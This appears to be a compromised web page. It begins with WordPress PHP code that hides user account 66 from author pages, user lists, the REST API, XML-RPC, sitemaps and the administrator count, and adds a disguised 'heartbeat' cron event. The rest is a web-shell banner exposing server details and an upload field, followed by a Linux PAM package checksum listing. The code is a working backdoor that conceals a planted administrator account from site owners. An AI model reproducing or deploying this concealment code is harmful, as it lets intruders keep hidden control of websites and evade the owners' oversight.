add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
3932cc1ac4aa854afd29c902357739aa usr/sbin/pam-auth-update f599dc6c03a2251b3b53ecd115d5b0e9 usr/sbin/pam_getenv 5b1de7fdce831c7675eae7b73440f12e usr/share/doc/libpam-runtime/copyright d194f98c1ff1ddf4c9f9a017ad3aff56 usr/share/lintian/overrides/libpam-runtime 30d1548a71ba49d2c0393e658485e252 usr/share/man/man5/pam.conf.5.gz ac1ce5a468b8557f91027ff619321ab2 usr/share/man/man7/PAM.7.gz d42ed0c6efcbfd02514d832ff462b112 usr/share/man/man8/pam-auth-update.8.gz 5c4b0eaaaedad1ebd060f20f53d52ea4 usr/share/man/man8/pam_getenv.8.gz ca78117c7ea5c63c58c25f0491e89153 usr/share/pam-configs/unix 117df385af6d411fbd1ffa97bc048f66 usr/share/pam/common-account a16cd434ecf1fd38ade67f3ce31ecdc6 usr/share/pam/common-account.md5sums 4e8989cd590e8bdeaa97c3d77320e3c4 usr/share/pam/common-auth 4e92a1187df5d09844592f3afbaf54e1 usr/share/pam/common-auth.md5sums 10fc4e7208f68b132eaa6623d10d73cb usr/share/pam/common-password 894b91ed648db1b4964c1c0b1c0686c9 usr/share/pam/common-password.md5sums b8f679fa2a973901a71f26860489c552 usr/share/pam/common-session 4680011710cfff2f80367ab93dc615fd usr/share/pam/common-session-noninteractive 4e12461200b864f5337bdc2acec117a7 usr/share/pam/common-session-noninteractive.md5sums e82dff1f5fabeb74e3f3ce5235fd1821 usr/share/pam/common-session.md5sums